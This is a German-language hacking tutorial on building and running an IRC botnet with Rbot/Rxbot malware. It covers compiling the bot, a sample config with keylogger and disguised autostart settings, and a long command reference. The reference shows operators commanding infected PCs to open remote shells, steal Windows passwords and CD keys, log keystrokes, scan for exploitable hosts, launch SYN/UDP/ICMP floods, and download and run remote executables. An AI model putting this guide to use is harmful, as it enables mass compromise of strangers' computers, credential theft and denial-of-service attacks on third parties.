Das Botnet v1.2 By TempBLack

[Ic3Drag0n]

; ––––––––––––––––†“–––––––––––––––----
; --- Das Botnet v1.2 By TempBLack ---
; ––––––––––––––––†“–––––––––––––––----
;
; 1. Vorwort
; 2. Was ist ein Botnet?
; 3. Welche Bots gibt es?
; 4. Rbot/Rxbot Konfigurieren und Erstellen
; 5. Server/PC mit IRC Dienst einrichten
; 6. Die Befehle vom Rbot/Rxbot
; 7. Abschluss
;
; ––––––––––––––––†“–
; --- 1. Vorwort ---
; ––––––––––––––––†“–
;
; Erst mal vor weg das verbreiten des Tut´s ist nur erlaubt wenn nichts verändert wird!
; Das Tut soll da zu dienen wie man ein Botnet aufbaut und es nicht ausnutzt.
; Ich werd hier versuchen alles genau zu erklären wie was geht um es für jeden
; verständlich zumachen. Ich werde keine links zu Seiten oder Download geben,
; denn ich gehe davon mal aus das ihr google benutzen könnt.
;
; ––––––––––––––––†“–––––––––––––
; --- 2. Was ist ein Botnet? ---
; ––––––––––––––––†“–––––––––––––
;
; Ein Botnet ist ein Server wo sich mehre tausende "Zombie" PCs Connecten und über das
; IRC-Protokol von einer oder mehren Person gesteuert werden. Das Botnet wird meist für angriffe
; auf Server genutzt oder um Spyware zu verbreiten. Die Verbreitung eines Bot
; geschieht über das exploiten (Die meist verwendet Art) von andern PCs. Das heißt ein
; Bot scannt nach Lücken in andern PCs wie z.B. nach der ASN Lücke. Findet der Bot einen oder mehre
; exploitable PC´s infiziert er ihn. So vergrößert sich ein Botnet. Es gibt auch schon den weg über P2P
; der immer mehr genutzt wird, weil es eine sehr große Anzahl von unsichern PCs gibt. Das neusten Bots
; scannen auch schon nach der VNC-Lücke die art hatte nur anfangs viel erfolg, aber jetzt sind fast alle
; geupdatet und so mit hat die Lücke kaum noch changsen.
;
; ––––––––––––––––†“––––––––––––––
; --- 3. Welche Bots gibt es? ---
; ––––––––––––––––†“––––––––––––––
;
; Es gibt viele verschiedne Bots um ein Botnet aufzubauen wie z.B. Rbot, Rxbot, Reptile und etc.....
; Es ist fast ein Paradies von Bots in meiner Sammlung habe ich über 100 Stück gezählt.
; Viele "Crews" bringen noch mehr auf da es immer neue Mods von Bots gibt.
; Am Empfehlens wertesten ist ein Rxbot der stabil läuft und mit euren Mods.
; Geschickter ist es, wenn man sich selber ein Bot programmiert.
; Die Public-Bots werden von den ganzen Anti-Viren Softwares
; erkannt und in sehr schlechten C++/C still geschrieben.
;
; ––––––––––––––––†“–––––––––––––––----------------
; --- 4.Rbot/Rxbot Konfigurieren und Erstellen ---
; ––––––––––––––––†“–––––––––––––––----------------
;
; Um ein Bot zu Erstellen sollte man Visual Studio 6.0 oder Visual C++ 6.0 haben mit
; SP5 und den Prozessor SDK Pack installiert haben um die Bots Fehler frei zu Erstellen.
; Bei ein neueren Compiler kann es sein das es nicht klappt durch den alten C++/C stiel der Bots
; und zu mehren Fehlern führt. Bei neuern Versionen des Rbot/Rxbot geht auch ein neueres Visual Studio.
; Reptile braucht wieder die 6.0 Versionen damit er Fehler frei läuft.
; Ich werd hier ein Beispiel config von Rbot/Rxbot vorstellen, die könnte je nach Version vom Rbot/Rxbot ab weichen.

Code:

; int port = 6667;            // server port
; int port2 = 6667;            // backup server port
; int socks4port = 874;            // Port # for sock4 daemon to run on  - CHANGE THIS!!!
; int tftpport = 69;            // Port # for tftp daemon to run on
; int httpport = 80;            // Port # for http daemon to run on
; int rloginport = 514;            // Port # for rlogin daemon to run on
; BOOL topiccmd = TRUE;            // set to TRUE to enable topic commands
; BOOL rndfilename = FALSE;         // use random file name
; BOOL AutoStart = TRUE;         // enable autostart registry keys
; char prefix = '.';            // command prefix (1 character max.)
; int maxrand = 6;            // how many random numbers in the nick
; int nicktype = CONSTNICK;         // nick type (see rndnick.h)
; BOOL nickprefix = FALSE;         // nick uptime & mirc prefix
;
; #ifdef DEBUG_LOGGING
; char logfile[]="%temp%\\yes.jpg";
; #endif
;
; #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
;
; #else  // Recommended to use this only for Crypt() setup, this is unsecure.
;
; char botid[] = "id";                  // bot id
; char version[] = "none";               // Bots !version reply
; char password[] = "4157";               // bot password
; char server[] = "ircd.server.com";            // server
; char serverpass[] = "";               // server password
; char channel[] = "#SiS";               // channel that the bot should join
; char chanpass[] = "213";               // channel password
; char server2[] = "";                  // backup server (optional)
; char channel2[] = "";                  // backup channel (optional)
; char chanpass2[] = "";               // backup channel password (optional)
; char filename[] = "";                  // destination file name
; char keylogfile[] = "system.txt";            // keylog filename
; char valuename[] = "Microsoft machine";         // value name for autostart
; char nickconst[] = "[SiS]-";               // first part to the bot's nick
; char szLocalPayloadFile[]="miconfig.dat";         // Payload filename
; char modeonconn[] = "-x+iB";               // Can be more than one mode and contain both + and -
; char exploitchan[] = "#SiS";               // Channel where exploit messages get redirected
; char keylogchan[] = "#SiS";               // Channel where keylog messages get redirected
; char psniffchan[] = "#SiS";               // Channel where psniff messages get redirected
;
; char *authost[] = {
;    "*@*"
; };
;
; ...
;
; #ifdef PLAIN_CRYPT
; char key[16] = "..."; // CHANGE THIS!!! hmmm..Do I even need this now? (16 character max.)
; #endif

; ––––––––––––––––†“–––––––––––––––--------------
; --- 5. Server/PC mit IRC Dienst einrichten ---
; ––––––––––––––––†“–––––––––––––––--------------
;
; Um das Tutorial jetzt nicht ewiglang zumachen wird ich keine genaue Anleitung geben.
; Als IRC-Dienst würde ich UnrealIRCd nehmen. Es läuft auf Linux und Windows und auf
; irc-mania gibt es ein Workshop wie man den Dienst unter Linux installiert,
; wenn man eine Windows Anleitung braucht google Smile.
;
; –-––––––––––––––––†“–––––––––––––-----
; --- 6. Die Befehle vom Rbot/Rxbot ---
; ––––––––––––––––†“–––––––––––––––-----
;
; Die Befehle für Rbot/Rxbot wurden einer Tabelle entnommen.
; Bei den andern Bots liegt meistens eine Datei mit den Befehlen bei
; oder ihr durch sucht die Hauptdatei nach den befehlen

Code:

General Commands
;
; action <@muzzleflash> .action #channel implodes irrationally
; [In #channel...]
; * minion implodes irrationally
; addalias <@muzzleflash> .addalias hello privmsg $chan hello
; <@muzzleflash> .hello
; <minion> hello
; aliases <@muzzleflash> .aliases
; <minion> -[alias list]-
; <minion> 0. opme = mode $chan +o $user
; <minion> 1. spastic = syn $1 445 120
; capture <@muzzleflash> .capture screen C:\Screenshot.jpg
; <minion> [CAPTURE]: Screen capture saved to: C:\Screenshot.jpg.
; clearlog <@muzzleflash> .clearlog
; <minion> [LOGS]: Cleared.
; clone <@muzzleflash> .clone irc.easynews.com 6667 #moose
; <minion> [CLONES]: Created on irc.easynews.com:6667, in channel #moose.
; cmd <@muzzleflash> .cmd dir
; <minion> [CMD]: Commands: dir
; cmdstop <@muzzleflash> .cmdstop
; <minion> [CMD] Remote shell stopped. (1 thread(s) stopped)
; crash <@muzzleflash> .crash
; <minion> [MAIN]: Crashing bot.
; currentip <@muzzleflash> .currentip
; <minion> [SCAN]: Scanning IP: 24.222.212.37, Port: 139.
; cycle <@muzzleflash> .cycle 5 #help
; * minion has left the channel.
; [5 seconds later...]
; * minion has joined the channel.
; delay <@muzzleflash> .delay 10 .quit
; [10 seconds later...]
; * minion has quit (Quit: later)
; delete <@muzzleflash> .delete C:\Screenshot.jpg
; <minion> [FILE]: Deleted 'C:\Screenshot.jpg'.
; die <@muzzleflash> .die
; * minion has quit (Quit: Connection Reset by Peer)
; disconnect <@muzzleflash> .disconnect
; * minion has quit (Quit: later.)
; dns <@muzzleflash> .dns www.google.com
; <minion> [DNS]: Lookup: www.google.com -> 216.239.33.101.
; driveinfo <@muzzleflash> .driveinfo
; <minion> [MAIN]: Disk Drive (C:\): 10,506,476KB total, 4,456,888KB free, 4,456,888KB available.
; <minion> [MAIN]: Cdrom Drive (D:\): Failed to stat, device not ready.
; email <@muzzleflash> .email pop3.hotmail.com 110 linus@linux.org bill@microsoft.com Linux > Microsoft
; <minion> [EMAIL]: Message sent to bill@microsoft.com.
; encrypt <@muzzleflash> .encrypt
; <minion> SOMETHING HERE!
; execute <@muzzleflash> .execute 1 notepad.exe
; <minion> [SHELL]: File opened: notepad.exe
; findfile <@muzzleflash> .findfile *screenshot* c:\
; <minion> [FINDFILE]: Searching for file: *screenshot*.
; <minion> Found: C:\Screenshot.jpg
; <minion> [FINDFILE]: Files found: 1.
; findfilestop <@muzzleflash> .findfilestop
; <minion> [FINDFILE] Find file stopped. (1 thread(s) stopped)
; findpass <@muzzleflash> .findpass
; <minion> [FINDPASS]: The Windows logon (Pid: <111>) information is: Domain: \\Windows, User: (Bill Gates/(no password)).
; flusharp <@muzzleflash> .flusharp
; <minion> [FLUSHDNS]: ARP cache flushed.
; flushdns <@muzzleflash> .flushdns
; <minion> [FLUSHDNS]: DNS cache flushed.
; get <@muzzleflash> .get C:\Screenshot.jpg
; <minion> [DCC]: Send File: C:\Screenshot.jpg, User: moose.
; getcdkeys <@muzzleflash> .getcdkeys
; <minion> Microsoft Windows Product ID CD Key: (11111-640-1111111-11111)
; <minion> [CDKEYS]: Search completed.
; getclip <@muzzleflash> .getclip
; <minion> -[Clipboard Data]-
; <minion> http://www.goat.cx
; gethost <@muzzleflash> .gethost microsoft.com
; <minion> [NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: 207.46.134.155. [Hostname]: microsoft.com.
; httpcon <@muzzleflash> .httpcon 24.222.212.37 80 GET / http://www.google.com
; *crashes*
; httpstop <@muzzleflash> .httpstop
; <minion> [HTTPD]: Server stopped. (1 thread(s) stopped.)
; httpserver <@muzzleflash> .http
; <minion> [HTTPD]: Server listening on IP: 216.239.33.101:81, Directory: \.
; id <@muzzleflash> .id
; <minion> minion-toe.
; identd <@muzzleflash> .identd on
; <minion> [IDENTD]: Server running on Port: 113.
; join <@muzzleflash> .join #chat
; [In #chat...] * minion has joined #chat
; keylog <@muzzleflash> .keylog on
; <minion> [KEYLOG]: Key logger active.
; <minion> [KEYLOG]: (Changed Windows: C:\)
; kill <@muzzleflash> .kill 4
; <minion> [PROC]: Process killed ID: 4
; killproc <@muzzleflash> .kill system.exe
; <minion> [PROC]: Process killed: system.exe
; killthread <@muzzleflash> .killthread 1
; <minion> [THREADS]: Killed thread: 1
; list <@muzzleflash> .list *cmd*
; <minion> Searching for: *cmd*
; <minion> login.cmd 08/23/2001 09:30 PM (487 bytes)
; <minion> Found 1 Files and 0 Directories
; log <@muzzleflash> .list *cmd*
; <minion> [LOG]: Begin
; <minion> [06-04-2004 22:35:33] [MAIN]: User: moose logged in.
; <minion> [06-04-2004 20:49:35] [MAIN]: Joined channel: #moose.
; <minion> [06-04-2004 20:49:35] [IDENTD]: Client connection from IP: 24.222.212.37:22400.
; <minion> [06-04-2004 20:49:35] [MAIN]: Connected to irc.microsoft.com.
; <minion> [06-04-2004 20:49:35] [IDENTD]: Server running on Port: 113.
; <minion> [06-04-2004 20:49:35] [MAIN]: Bot started.
; <minion> [LOG]: List complete.
; login <@muzzleflash> .login xxxxxx
; <minion> [MAIN]: Password accepted.
; logout <@muzzleflash> .who
; <minion> -[Login List]-
; <minion> 0. moose!moose@internet.yahoo.com
; <minion> 1. antelope!deer@i-own.blogspot.com
; <minion> 2.
; <@muzzleflash> .logout 1
; <minion> [MAIN]: User antelope logged out
; logstop <@muzzleflash> .logstop
; <minion> [LOG]: Log list stopped. (1 thread(s) stopped.)
; mirccmd <@muzzleflash> .mirccmd //scon -a ame is bored
; <minion> [mIRC]: Command sent.
; [In every of the user's channels...]
; * tomorrow is bored
; mode <@muzzleflash> .mode #help +o moose
; [In #help...]
; * minion sets mode +o moose
; netinfo <@muzzleflash> .netinfo
; <minion> [NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: 207.46.134.155. [Hostname]: microsoft.com.
; nick <@muzzleflash> .nick marker
; * minion is now know as marker
; open <@muzzleflash> .open http://www.mozilla.org/products/firefox
; <minion> [SHELL]: File opened: http://www.mozilla.org/products/firefox
; opencmd <@muzzleflash> .opencmd
; <minion> [CMD]: Remote shell ready.
; part <@muzzleflash> .part #help
; [In #help...]
; * Parts: minion
; prefix <@muzzleflash> .prefix ?
; <minion> [MAIN]: Prefix changed to: '?'.
; <@muzzleflash> ?ni
; <minion> [NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: 207.46.134.155. [Hostname]: microsoft.com.
; psniff Very Buggy in most Version
; privmsg <@muzzleflash> .privmsg #chat Hello lusers.
; [In #Chat...]
; <minion> Hello lusers.
; procs <@muzzleflash> .procs
; <minion> [PROC]: Listing processes:
; <minion> System (4)
; <minion> smss.exe (380)
; <minion> csrss.exe (436)
; <minion> [PROC]: Process list completed.
; etc.
; process_stop <@muzzleflash> .process_stop
; <minion> [PROC]: Process list stopped. (1 thread(s) stopped.)
; quit <@muzzleflash> .quit
; * minion quit (Quit: later)
; raw <@muzzleflash> .raw QUIT :what.
; * minion quit (Quit: what)
; readfile <@muzzleflash> .read onelinefile.txt
; <minion> This is one line
; <minion> [MAIN]: Read file complete: onelinefile.txt
; reboot <@muzzleflash> .reboot
; <minion> [MAIN]: Rebooting system.
; reconnect <@muzzleflash> .reconnect
; * minion has quit (Quit: Client Exited)
; * qewuyuf has joined #moose
; remove <@muzzleflash> .remove
; <minion> [MAIN]: Removing Bot.
; rename <@muzzleflash> .rename C:\Screenshot.jpg C:\hell.jpg
; <minion> [FILE]: Rename: 'C:\Screenshot' to: 'C:\hell.jpg'.
; repeat <@muzzleflash> .repeat 3 ,privmsg #moose hello
; <minion> hello
; <minion> hello
; <minion> hello
; rloginserver <@muzzleflash> .rloginserver
; <minion> [RLOGIND]: Server listening on IP: 216.239.33.101:37, Username: moose.
; rloginstop <@muzzleflash> .rloginstop
; <minion> [RLOGIND]: Server stopped. (1 thread(s) stopped).
; rndnick <@muzzleflash> .rndnick
; * minion is now know as howshos
; secure <@muzzleflash> .secure
; <minion> [SECURE]: Securing system.
; securestop <@muzzleflash> .securestop
; <minion> [SECURE]: Securing stopped. (1 thread(s) stopped).
; server <@muzzleflash> .server irc.dal.net
; <@muzzleflash> .reconnect
; [Connects to irc.dal.net...]
; socks4 <@muzzleflash> .socks4
; <minion> [SOCKS4]: Server started on: 216.239.33.101:28364
; socks4stop <@muzzleflash> .socks4stop
; <minion> [SOCKS4]: Server stopped. (1 thread(s) stopped.)
; status <@muzzleflash> .status
; <minion> [MAIN]: Status: Ready. Bot Uptime: 11d 4h 3m.
; sysinfo <@muzzleflash> .sysinfo
; <minion> [SYSINFO]: [CPU]: 2210MHz. [RAM]: 1,048,576KB total, 649,216KB free. [Disk]: 10,506,476KB total, 4,446,864KB free. [OS]: Windows XP (Service Pack 1) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\System32. [Hostname]: microsoft.com (207.46.134.155). [Current User]: Bill Gates. [Date]: 02:Jun:2004. [Time]: 23:04:47. [Uptime]: 17d 8h 28m.
; threads <@muzzleflash> .threads
; <minion> -[Thread List]-
; <minion> 0. [MAIN]: Bot started.
; <minion> 1. [IDENTD]: Server running on Port: 113.
; <minion> 2. [TCP]: Spoofed ack flooding: (24.222.212.37:337) for 120 seconds.
; <minion> 3. [TFTP]: Server started on Port: 2183, File: C:\WINDOWS\System32\commmand.exe, Request: commmand.exe.
; <minion> 4. [THREADS]: List threads.
; uptime <@muzzleflash> .uptime
; <minion> [MAIN]: Uptime: 17d 8h 28m.
; version <@muzzleflash> .version
; <minion> [MAIN]: rBot-Moose
; visit <@muzzleflash> .visit http://www.kernel.org
; <minion> [VISIT]: URL visited.
; who <@muzzleflash> .who
; <minion> -[Login List]-
; <minion> 0. moose!moose@internet.yahoo.com
; <minion> 1. antelope!deer@i-own.blogspot.com
; <minion> 2.
;
; Scanning Functions
;
; advscan <@muzzleflash> .advscan netbios 100 5 120 -b -r
; <minion> [SCAN]: Random Port Scan started on 192.168.x.x:139 with a delay of 5 seconds for 120 minutes using 100 threads.
; scan <@muzzleflash> .scan 24.222.212.37 445 10
; <minion> [SCAN]: Port scan started: 24.222.212.37:445 with delay: 10(ms).
; scanstats <@muzzleflash> .scanstats
; <minion> [SCAN]: Exploit Statistics: WebDav: 0, NetBios: 0, NTPass: 0, Dcom135: 0, Dcom445: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, Beagle1: 0, Beagle2: 0, MyDoom: 0, lsass: 10, Optix: 0, UPNP: 0, NetDevil: 0, DameWare: 0, Kuang2: 0, Sub7: 0, Total: 0 in 0d 0h 0m.
; scanstop <@muzzleflash> .scanstop
; <minion> [SCAN]: Scan stopped. (11 thread(s) stopped.)
;
; Clone Functions
;
; c_action <@muzzleflash> .c_action 1 #help partially stabz self
; [In #help...]
; * clonal partially stabz self
; c_join <@muzzleflash> .c_join 1 #Chat
; [In #Chat...]
; * clonal has join #Chat
; c_mode <@muzzleflash> .c_mode 1 #chat +o moose
; [In #Chat...]
; * clonal has set mode +o moose
; c_nick <@muzzleflash> .c_nick 1 clenal
; * clonal is now know as clenal
; c_privmsg <@muzzleflash> .c_privmsg 1 #chat Hello lusers.
; [In #Chat...]
; Hello lusers.
; c_quit <@muzzleflash> .c_quit 1
; * clone has quit (Quit: later.)
; c_raw <@muzzleflash> .c_raw 1 QUIT :wut
; * clone has quit (Quit: wut)
; c_rndnick <@muzzleflash> .c_rndnick
; * clone is now know as esfgisd

; DDoS Functions

Code:

ddos.stop <@muzzleflash> .ddos.stop
; <minion> [DDoS] DDoS flood stopped. (1 thread(s) stopped)
; ddos.syn
; ddos.ack
; ddos.random <@muzzleflash> .ddos.random
; <minion> [DDoS]: Flooding: (24.222.212.37:337) for 120 seconds.
; icmpflood <@muzzleflash> .icmpflood 24.222.212.37 120 -r
; <minion> [ICMP]: Flooding: (24.222.212.37) for 60 seconds.
; pingflood <@muzzleflash> .pingflood 24.222.212.37 120 1000 4096 100
; <minion> [UDP]: Sending 1000 packets to: 24.222.212.37. Packet size: 4096, Delay: 100(ms).
; pingstop <@muzzleflash> .pingstop
; <minion> [PING] Ping flood stopped. (1 thread(s) stopped)
; synflood <@muzzleflash> .synflood 24.222.212.37 337 120
; <minion> [SYN]: Flooding: (24.222.212.37:337) for 120 seconds.
; synstop <@muzzleflash> .pingstop
; <minion> [SYN]: Syn flood stopped. (1 thread(s) stopped.)
; tcpflood <@muzzleflash> .tcpflood ack 24.222.212.37 337 120 -r
; <minion> [TCP]: Spoofed ack flooding: (24.222.212.37:337) for 120 seconds.
; udpflood <@muzzleflash> .udpflood 24.222.212.37 1000 4096 100
; <minion> [UDP]: Sending 1000 packets to: 24.222.212.37. Packet size: 4096, Delay: 100(ms).
; udpstop <@muzzleflash> .udpstop
; <minion> [UDP] UDP flood stopped. (1 thread(s) stopped)
;
; Downloads
;
; download <@muzzleflash> .download http://nsa.gov/file.exe c:\windows\devldr32.exe 1
; <minion> [DOWNLOAD]: Downloading URL: http://nsa.gov/file.exe to: c:\windows\devldr32.exe.
; <minion> [DOWNLOAD]: Downloaded 92.1 KB to c:\windows\devldr32.exe @ 92.1 KB/sec.
; <minion> [DOWNLOAD]: Opened: c:\windows\devldr32.exe.
; update <@muzzleflash> .update http://nsa.gov/file.exe mouse1
; <minion> [UPDATE]: Downloading update from: http://nsa.gov/file.exe.